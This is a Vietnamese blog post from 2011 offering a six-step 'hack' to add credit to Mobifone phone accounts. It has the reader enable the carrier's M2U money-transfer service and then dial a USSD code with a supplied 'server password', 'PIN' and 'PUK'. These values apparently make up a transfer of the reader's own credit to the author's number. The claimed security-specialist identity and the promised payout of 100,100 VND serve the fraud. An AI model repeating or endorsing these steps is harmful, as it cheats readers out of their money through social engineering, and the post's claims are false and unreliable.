Danh sách Blog của Tôi

Thứ Sáu, 14 tháng 10, 2011

Hack tài khoản mobifone!!!

Hiện nay như các bạn cũng đã thấy, rất nhiều các cá nhân post bài lên các diễn đàn trong nước với nội dung "hach tiền của mạng VIETTEL, VinaPhone,..." .Để tìm được những topic như thế không hề khó. Nhưng tiền hach được thì chẳng thấy, chỉ thấy tiền trong tài khoản đội nón ra đi. Chính vì những lí do nêu trên, tôi xin giới thiệu : Tôi

Họ tên: Trần Thị Kiều Hạnh.
Nghề nghiệp : Chuyên viên Bảo mật Mạng – Công ty cổ phần Kiến Á – 216, Nam Kỳ Khởi Nghĩa, P.06, Q.03, Tp.HCM.

Tôi không dám nhận mình là một nhân viên ưu tú, nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng. Hôm nay tôi xin giới thiệu với các bạn cách hach tiền tài khoản Mobiphone hoàn toàn chính xác. Do thời gian có hạn nên tôi nói ngắn gọn như sau:
Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

1 - Một sim MOBIFONE hoạt động trên 230 ngày (hơn 7 tháng). Tại sao phải cần vậy? Vì chỉ có những sim hoạt động trên 7 tháng mới được Mobifone đưa vào mã bảo vệ tài khoản chuyển tiền (6 tháng chưa được đâu các bạn) trên server Mobifone quản lý.

2 - Rất đơn giản: các bạn làm theo cú pháp như sau: *117*0000*0000#. Hệ thống sẽ gửi cho bạn 1 tin nhắn. Bạn vào trả lời, soạn tin với cú pháp 1 và gửi đi để đồng ý (nếu bạn chưa có mật khẩu sever). Tại sao phải cần vậy? Vì chúng ta hach thông qua dịch vụ M2U của Mobifone.

4 - Tài khoản trong sim của bạn phải có nhiều hơn 40101 Vnd.

5 - Các bạn làm theo cú pháp như sau: *119* mật khẩu Server *mã PIN *mã PUK#. Hệ thống sẽ trả lời cho bạn 1 tin nhắn, bạn soạn tin 1 để đồng ý.
Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian (viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập số điện thoại của bạn trên Server). Tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Mobifone thôi nhé các bạn):

Mật khẩu Server: 935558215
Mã PIN :30000
Mã PUK: 0000

Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp trên và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt của bạn sẽ tự động được công thêm tiền hach được sau khi đăng nhập (tiền hach được sẽ công thêm vào tài khoản chính). Thật ra đây là một trong những cách hach tài khoản điện thoại mà các hacher chuyên nghiệp trên thế giới gần đây mới sử dụng (nguyên lý là dùng mã hach đảo chiều các dịch vụ chuyển tiền từ các Server di động, chẳng hạn như M2U, hiện trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

6- Sau khi làm xong những bước trên: các bạn chỉ cần đợi 15 phút, sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 100100 vnd. (đã test thành công, không một lỗi nhỏ).

Tất cả chỉ có vậy thôi, tôi đưa ra mong các bạn làm thử nghiệm nếu hoạt động tốt tôi sẽ mở thêm nhiều sever trung gian hơn nữa. Chúc các bạn thành công và nhớ cám ơn tôi nếu thấy thủ thuật này hữu ích cho bạn nhé. (Lưu ý: không được hach quá 4 lần trong 1 ngày). Nếu cần, xin các bạn liên hệ với tôi qua nickname uocmoxanh20011@yahoo.com hoặc email uocmoxanh20011@gmail.com, hoặc cũng có thể liên lạc trực tiếp với tôi từ 11h đến 13h các ngày trong tuần (trừ chủ nhật) tại cổng Công ty cổ phần Kiến Á – 216, Nam Kỳ Khởi Nghĩa, P.06, Q.03, Tp.HCM.

Không có nhận xét nào:

Đăng nhận xét